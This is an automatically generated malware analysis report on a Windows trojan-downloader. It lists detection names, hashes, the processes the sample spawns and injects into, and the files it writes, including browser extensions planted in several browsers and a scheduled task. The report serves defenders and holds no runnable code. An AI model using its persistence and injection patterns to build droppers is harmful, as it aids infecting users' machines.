Dropped.Trojan.Generic.8860750_0dda15c3b5
Dropped:Trojan.Generic.8860750 (B) (Emsisoft), Dropped:Trojan.Generic.8860750 (AdAware), Adware.Win32.Webalta.FD, Installer.Win32.InnoSetup.FD, Installer.Win32.InnoSetup.2.FD, Trojan-Banker.Win32.Brasil.FD, Trojan-Downloader.Win32.Karagany.1.FD, Trojan.NSIS.StartPage.FD, Trojan.Win32.Delphi.FD, Trojan.Win32.Sasfis.FD, Trojan.Win32.Swrort.3.FD, VirTool.Win32.DelfInject.FD, mzpefinder_pcap_file.YR, InstallerInnoSetup.YR (Lavasoft MAS)
Behaviour: Trojan-Downloader, Banker, Trojan, Installer, VirTool, Adware
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
MD5: 0dda15c3b539824d03443634931b0756
SHA1: dade5389732731f28eeac8b4d6e5e64f5ed68e9b
SHA256: eb1dd7a52d7fd8bb4876e5129064168efa595b3cfc8cb6972ef1c627f0547b09
SSDeep: 12288:OUWA3AheuswyYpUH X3Z3lgk9EsmoMZfZbYUrEiH191eznYE8Rd:OUWqistYWH03NlXEsmoMEoF191E8Rd
Size: 543694 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: nethfdrv
Created at: 2009-08-16 14:05:35
Analyzed on: WindowsXP SP3 32-bit
Summary:
Trojan-Downloader. A Trojan program that downloads files from the Internet without the user's knowledge and executes them.
Payload
No specific payload has been found.
Process activity
The Dropped creates the following process(es):
fm4.exe:260
Almanac_clnh_2014.8.3._126cl.exe:2900
AlmDay.exe:1016
assistupdate.exe:2660
setup_2948-140896.exe:1164
axult.exe:460
%original file name%.exe:264
FHSev.exe:2280
FHSev.exe:2212
FHSev.exe:968
AlmDayQuick.exe:2908
juese.exe:2488
sjss_jing_zhimeng_217.exe:1724
sjss.exe:216
a-zm-157391-v5.exe:2236
setup_2949-14598.exe:612
OfficeAssist.0195.80.1015.exe:1628
OfficeAssist.0195.80.1015.exe:448
fm4svr.exe:3608
axuls.exe:1160
ignite.exe:2880
ignite.exe:2764
AppleDTAssistant.exe:1856
regsvr32.exe:2112
regsvr32.exe:500
regsvr32.exe:2324
kindness.exe:2856
Application Dataypfbyfgmr.exe:2796
iApple.exe:1748
apples_5_1008.exe:816
tqrl_89_177560.exe:1644
xkcc_50091167828.exe:2196
The Dropped injects its code into the following process(es):
IFoxInstall-y-c203945859-run-s-x.exe:1360
AppleDesktop.exe:1952
FHSev.exe:2328
Application Dataypfbyfgmr.tmp:2860
fm4svr.exe:1392
fjwyusp.exe:1336
ignite.exe:2576
mankind.exe:2904
UUSEE_kb1003_Setup_133149.exe:3756
Mutexes
The following mutexes were created/opened:
No objects were found.
File activity
The process fm4.exe:260 makes changes in the file system.
The Dropped creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ARUFA1MT\stj[1].htm (3 bytes)
%Program Files%\FM4.0\201409180317\Data\client.ini (42 bytes)
%Program Files%\FM4.0\201409180317\Data\server.ini (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ARUFA1MT\ver[1].txt (36 bytes)
%Program Files%\FM4.0\201409180317\Data\user2.ini (448 bytes)
%Program Files%\FM4.0\201409180317\SysConfig.ini (468 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ARUFA1MT\CAS12RG5.htm (3 bytes)
The Dropped deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ARUFA1MT\stj[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ARUFA1MT\CAS12RG5.htm (0 bytes)
The process Almanac_clnh_2014.8.3._126cl.exe:2900 makes changes in the file system.
The Dropped creates and/or writes to the following file(s):
%Documents and Settings%\All Users\Desktop\½ñÈÕ»ÆÀú.lnk (804 bytes)
%Documents and Settings%\%current user%\Application Data\AlmDay\Skins\Menu\menu_bg.png (119 bytes)
%Documents and Settings%\%current user%\Application Data\AlmDay\Skins\Menu\menuselectbar.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\AlmDay\AlmDay.exe (267 bytes)
%Documents and Settings%\%current user%\NTUSER.DAT.LOG (6312 bytes)
%Documents and Settings%\%current user%\Application Data\AlmDay\Disconnect\disconnect.html (969 bytes)
%Documents and Settings%\%current user%\Application Data\AlmDay\Skins\Menu\menurmark.png (2 bytes)
%Documents and Settings%\%current user%\Application Data\AlmDay\Skins\joke.png (7 bytes)
%Documents and Settings%\%current user%\Application Data\AlmDay\Skins\Mini\bakground.png (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ARUFA1MT\z_stat[1].php (2068 bytes)
%Documents and Settings%\%current user%\Application Data\AlmDay\Skins\Search\right.png (1 bytes)
%System%\config\SOFTWARE.LOG (3043 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\6LMBG52V\install[1].htm (174 bytes)
%Documents and Settings%\%current user%\Local Settings\AlmDay\config\soft.inf (26 bytes)
%Documents and Settings%\%current user%\Start Menu\³ÌÃÂò\½ñÈÕ»ÆÀú\ÅäÖÃ\öÃâ€ÃƒËœÃ‚½Ã±ÃˆÃ•Ȯ˜.lnk (814 bytes)
%Documents and Settings%\%current user%\Application Data\AlmDay\Uninst.exe (96 bytes)
%Documents and Settings%\%current user%\Application Data\AlmDay\Disconnect\disconnect.jpg (20 bytes)
%Documents and Settings%\%current user%\Application Data\AlmDay\config\TipsConfig.ini (1 bytes)
%Documents and Settings%\%current user%\Application Data\AlmDay\AlmDayQuick.exe (98 bytes)
%Documents and Settings%\%current user%\Application Data\AlmDay\Skins\Search\bg_icon.png (969 bytes)
%Documents and Settings%\%current user%\Start Menu\³ÌÃÂò\½ñÈÕ»ÆÀú\½ñÈÕ»ÆÀú.lnk (808 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\½ñÈÕ»ÆÀú.lnk (774 bytes)
%Documents and Settings%\%current user%\Application Data\AlmDay\data\data.bin (324 bytes)
%Documents and Settings%\%current user%\Application Data\AlmDay\Skins\Menu\menuright.png (2 bytes)
%Documents and Settings%\%current user%\NTUSER.DAT (6452 bytes)
%Documents and Settings%\%current user%\Application Data\AlmDay\Skins\Mini\close.png (2 bytes)
%Documents and Settings%\%current user%\Application Data\AlmDay\Skins\Menu\menuseparator.png (935 bytes)
%Documents and Settings%\%current user%\Application Data\AlmDay\AlmDayAuxiliary.dll (154 bytes)
%Documents and Settings%\%current user%\Application Data\AlmDay\Skins\life.png (2 bytes)
%Documents and Settings%\%current user%\Application Data\AlmDay\Skins\line.png (976 bytes)
%Documents and Settings%\%current user%\Application Data\AlmDay\Skins\yun.png (3 bytes)
%Documents and Settings%\%current user%\Application Data\AlmDay\Skins\game.png (2 bytes)
%System%\config\software (1615 bytes)
%Documents and Settings%\%current user%\Application Data\AlmDay\Skins\Search\close.png (2 bytes)
%Documents and Settings%\%current user%\Application Data\AlmDay\Skins\set.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\AlmDay\Skins\small_bg.png (998 bytes)
%Documents and Settings%\%current user%\Application Data\AlmDay\Skins\Search\left.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\AlmDay\Skins\Search\la_select.png (3 bytes)
%Documents and Settings%\%current user%\Application Data\AlmDay\Skins\Search\la_focus.png (3 bytes)
%Documents and Settings%\%current user%\Application Data\AlmDay\Skins\Mini\min.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\AlmDay\Skins\bk.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\AlmDay\config\SearchConfig.ini (681 bytes)
%Documents and Settings%\%current user%\Application Data\AlmDay\config\TitleConfig.ini (345 bytes)
The Dropped deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ARUFA1MT\z_stat[1].php (0 bytes)
The process IFoxInstall-y-c203945859-run-s-x.exe:1360 makes changes in the file system.
The Dropped creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\IFoxInfo.ini (178 bytes)
The process AlmDay.exe:1016 makes changes in the file system.
The Dropped creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (221 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (207 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][2].txt (400 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@bing[1].txt (1348 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][2].txt (400 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@msn[2].txt (332 bytes)
%Documents and Settings%\%current user%\Local Settings\AlmDay\config\soft.inf (150 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ARUFA1MT\rmsloaderdelayeddiv[2].js (549 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\6LMBG52V\search[1].htm (540 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@msn[1].txt (694 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (5820 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\P4NAZ85F\ips1388[1].htm (388 bytes)
%Documents and Settings%\%current user%\Local Settings\AlmDay\config\Assist\cybercafe.conf (624 bytes)
%Documents and Settings%\%current user%\Local Settings\AlmDay\config\Assist\mnconf.conf (2 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (207 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\U2EALEEE\Passport[1].htm (436 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (194 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\6LMBG52V\iplookup[1].htm (153 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ARUFA1MT\rmsloaderdelayeddiv[1].js (205 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@bing[2].txt (1730 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\P4NAZ85F\WindowsLiveConnect_c[1].js (280 bytes)
The Dropped deletes the following file(s):
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@bing[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@msn[2].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@msn[1].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\AlmDay\config\Assist\cybercafe.conf (0 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\AlmDay\config\Assist\mnconf.conf (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ARUFA1MT\rmsloaderdelayeddiv[1].js (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@bing[2].txt (0 bytes)
The process assistupdate.exe:2660 makes changes in the file system.
The Dropped creates and/or writes to the following file(s):
%WinDir%\Tasks\AssistantUpdateTask_adm.job (428 bytes)
The process setup_2948-140896.exe:1164 makes changes in the file system.
The Dropped creates and/or writes to the following file(s):
%Program Files%\FM4.0\201409180317\avcodec-54.dll (23424 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\FM4.0\FM4.0.lnk (787 bytes)
%Program Files%\FM4.0\201409180317\Data\client.ini (36 bytes)
%Program Files%\FM4.0\201409180317\channels.xml (784 bytes)
%Program Files%\FM4.0\201409180317\Data\dh.ini (56 bytes)
%Program Files%\FM4.0\201409180317\FHSev.exe (11048 bytes)
%Program Files%\FM4.0\201409180317\SysConfig.ini (664 bytes)
%Program Files%\FM4.0\201409180317\libav.dll (6360 bytes)
%Program Files%\FM4.0\201409180317\source.dll (6584 bytes)
%Program Files%\FM4.0\201409180317\swresample-0.dll (3312 bytes)
%Program Files%\FM4.0\201409180317\pthreadGC2.dll (3616 bytes)
%Program Files%\FM4.0\201409180317\favorfm.xml (440 bytes)
%Program Files%\FM4.0\201409180317\DuiLib.dll (16288 bytes)
%Program Files%\FM4.0\201409180317\fm4svr.exe (23424 bytes)
%Program Files%\FM4.0\201409180317\avformat-54.dll (12088 bytes)
%Program Files%\FM4.0\201409180317\Data\version.ini (32 bytes)
%Program Files%\FM4.0\201409180317\Unins.exe (9608 bytes)
%Program Files%\FM4.0\201409180317\fm4.exe (63950 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\FM4.0\ÅäÖù¤¾ß\öÃâ€ÃƒËœFM4.0.lnk (813 bytes)
%Program Files%\FM4.0\201409180317\avcore.dll (2392 bytes)
%Program Files%\FM4.0\201409180317\Data\setup.ini (124 bytes)
%Program Files%\FM4.0\201409180317\audio.dll (3616 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\FM4.0\¹Ù·½Ö÷Ò³.lnk (334 bytes)
%Program Files%\FM4.0\201409180317\Data\user2.ini (56 bytes)
%Program Files%\FM4.0\201409180317\avutil-52.dll (5520 bytes)
The process axult.exe:460 makes changes in the file system.
The Dropped creates and/or writes to the following file(s):
%Program Files%\fjwyusp\hzsoft\UUSEE_kb1003_Setup_133149.exe (721630 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ARUFA1MT\UUSEE_kb1003_Setup_133149[1].exe (783977 bytes)
%Program Files%\fjwyusp\hzsoft\setup_2949-14598.exe (689706 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\P4NAZ85F\setup_2949-14598[1].exe (752556 bytes)
The process %original file name%.exe:264 makes changes in the file system.
The Dropped creates and/or writes to the following file(s):
%Program Files%\fjwyusp\fjwyusp.exe (23610 bytes)
%Program Files%\fjwyusp\rnr20.dll (3 bytes)
The Dropped deletes the following file(s):
%Program Files%\fjwyusp\__tmp_rar_sfx_access_check_467000 (0 bytes)
The process AppleDesktop.exe:1952 makes changes in the file system.
The Dropped creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Application Data\AppleDesktopData\UserData\AppleConfig.ini (527 bytes)
%Documents and Settings%\%current user%\Application Data\AppleDesktopData\UserData\AppleData.add.bk (16 bytes)
%Documents and Settings%\%current user%\Application Data\AppleDesktopData\UserData\AppleData.add.write_cache (16 bytes)
The Dropped deletes the following file(s):
%Documents and Settings%\%current user%\Application Data\AppleDesktopData\UserData\AIcoCache.dat (0 bytes)
The process FHSev.exe:2328 makes changes in the file system.
The Dropped creates and/or writes to the following file(s):
%Program Files%\FM4.0\201409180317\Data\0317.Tmp (1268 bytes)
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\OFK7QZUX\Update[1].rar (2052 bytes)
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\QLSNQ10Z\fwtj[1].htm (3 bytes)
The Dropped deletes the following file(s):
%Program Files%\FM4.0\201409180317\Data\0317.Tmp (0 bytes)
The process AlmDayQuick.exe:2908 makes changes in the file system.
The Dropped creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\AlmDay\config\Driver\Dragon.dat (9 bytes)
%Documents and Settings%\%current user%\Local Settings\AlmDay\config\config.ini (46 bytes)
%Documents and Settings%\%current user%\Local Settings\AlmDay\config\Assist\data.dat (388 bytes)
The process Application Dataypfbyfgmr.tmp:2860 makes changes in the file system.
The Dropped creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\is-JV8SK.tmp\_isetup\_RegDLL.tmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-JV8SK.tmp\Tool.dll (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-JV8SK.tmp\ISTask.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-JV8SK.tmp\_isetup\_shfoldr.dll (23 bytes)
The process juese.exe:2488 makes changes in the file system.
The Dropped creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\6LMBG52V\focus-img-button-png8[1].png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\U2EALEEE\1409112564312005[1].jpg (64625 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ARUFA1MT\jstmbase[1].css (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\U2EALEEE\wz-main-bg[1].jpg (33202 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\P4NAZ85F\jquery.base64[1].js (2365 bytes)
%Documents and Settings%\All Users\Start Menu\¢ñnetert Hao¢ñ23.lnk (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\6LMBG52V\jquery.cookie.1.3.1[1].js (73 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ARUFA1MT\jstmbase[2].css (7 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\U2EALEEE\home-page-png8[1].png (8745 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\¢ñnetert Hao¢ñ23.lnk (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\P4NAZ85F\home-page[1].png (30010 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\U2EALEEE\jquery-1.10.2.min[1].js (58245 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\6LMBG52V\1389683374154825[1].gif (2553 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\6LMBG52V\1389682959213947[1].gif (2553 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\Startup\ç»Â色åâ€Âé—¨.lnk (611 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\U2EALEEE\1409210600946002[1].jpg (65433 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\P4NAZ85F\1389683394108438[1].gif (2553 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ARUFA1MT\1389683211750106[1].gif (4473 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ARUFA1MT\is_Desktop[1].htm (1666 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\6LMBG52V\jquery.slide[1].js (993 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\U2EALEEE\1389683070249849[1].gif (4014 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ARUFA1MT\is_Desktop[1] (4263 bytes)
%Documents and Settings%\All Users\Desktop\¢ñnetert Hao¢ñ23.lnk (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\P4NAZ85F\1406784233525194[1].jpg (77561 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\P4NAZ85F\1.1.0.0a-zm-157391-v5[1].htm (930 bytes)
The Dropped deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ARUFA1MT\jstmbase[1].css (0 bytes)
The process sjss_jing_zhimeng_217.exe:1724 makes changes in the file system.
The Dropped creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Application Data\sjss\sjss.exe (1837 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\sjss\image\2.png (13 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\速æÂ·æÂœç´¢\速æÂ·æÂœç´¢.lnk (693 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\速æÂ·æÂœç´¢.lnk (1428 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\sjss\Config.ini (48 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\sjss\uninstall.exe (267 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\速æÂ·æÂœç´¢.lnk (685 bytes)
%Documents and Settings%\All Users\Desktop\速æÂ·æÂœç´¢.lnk (681 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\sjss\SouSuo.zip (29 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\sjss\image\3.png (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\sjss\image\0.png (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\sjss\image\1.png (6 bytes)
%Documents and Settings%\All Users\Start Menu\速æÂ·æÂœç´¢.lnk (681 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\sjss\install_1410999409.tmp (301 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\速æÂ·æÂœç´¢\å¸载速æÂ·æÂœç´¢.lnk (912 bytes)
The Dropped deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\U2EALEEE\kbtongji[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\sjss\install_1410999409.tmp (0 bytes)
The process a-zm-157391-v5.exe:2236 makes changes in the file system.
The Dropped creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Application Data\liebao\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\res\images\icon-128.png (143 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\360Chrome\Chrome\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\js\background.js (1 bytes)
%Documents and Settings%\%current user%\Application Data\360se6\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\pop.html (947 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\liebao\User Data\Default\Extensions\abalpgokkijabpacojnmblmjomlmfbop\1.0.0_0\jquery.min.js (601 bytes)
%Documents and Settings%\%current user%\Application Data\360se6\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\js\redirect.js (648 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\360se6\User Data\Default\Extensions\abalpgokkijabpacojnmblmjomlmfbop\1.0.0_0\jquery.min.js (601 bytes)
%Program Files%\jstm\ptc (9 bytes)
%Documents and Settings%\%current user%\Application Data\360se6\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\js\background.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\360se6\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\res\js\background.js (380 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\background.html (223 bytes)
%Documents and Settings%\%current user%\Application Data\360se6\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\redirect.html (137 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\360se6\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\manifest.json (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\liebao\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\res\images\icon-48.png (88 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\manifest.json (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\liebao\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\js\pop.js (282 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\ç»Â色åâ€Âé—¨\å¸载.lnk (599 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\js\pop.js (282 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\background.html (223 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\360se6\User Data\Default\Preferences (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\360Chrome\Chrome\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\res\images\icon-128.png (143 bytes)
%Documents and Settings%\%current user%\Application Data\360se6\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\res\js\zz.js (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\360Chrome\Chrome\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\res\js\jquery.min.js (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\abalpgokkijabpacojnmblmjomlmfbop\1.0.0_0\jquery.min.js (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ext.7z (106408 bytes)
%Documents and Settings%\%current user%\Application Data\360se6\User Data\Default\Extensions\abalpgokkijabpacojnmblmjomlmfbop\1.0.0_0\manifest.json (861 bytes)
%Documents and Settings%\%current user%\Application Data\360se6\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\res\js\background.js (380 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Extensions\abalpgokkijabpacojnmblmjomlmfbop\1.0.0_0\manifest.json (861 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\liebao\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\img\icon_128.png (607 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\res\js\common.js (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\360Chrome\Chrome\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\pop.html (947 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Almanac_clnh_2014.8.3._126cl.exe (1947589 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\liebao\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\js\redirect.js (648 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\liebao\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\res\css\base.css (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\liebao\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\js\index.js (212 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\liebao\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\img\icon_16.png (524 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\360Chrome\Chrome\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\img\icon_128.png (607 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\_locales\zh_CN\messages.json (493 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\manifest.json (937 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\360se6\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\background.html (502 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\360se6\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\js\pop.js (282 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\js\redirect.js (648 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\res\js\common.js (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\360Chrome\Chrome\User Data\Default\Extensions\abalpgokkijabpacojnmblmjomlmfbop\1.0.0_0\manifest.json (861 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\js\redirect.js (648 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\res\js\zz.js (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\pop.html (947 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\img\icon_16.png (524 bytes)
%Documents and Settings%\%current user%\Application Data\360se6\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\js\index.js (212 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\background.html (502 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\liebao\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\pop.html (947 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\360se6\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\index.html (261 bytes)
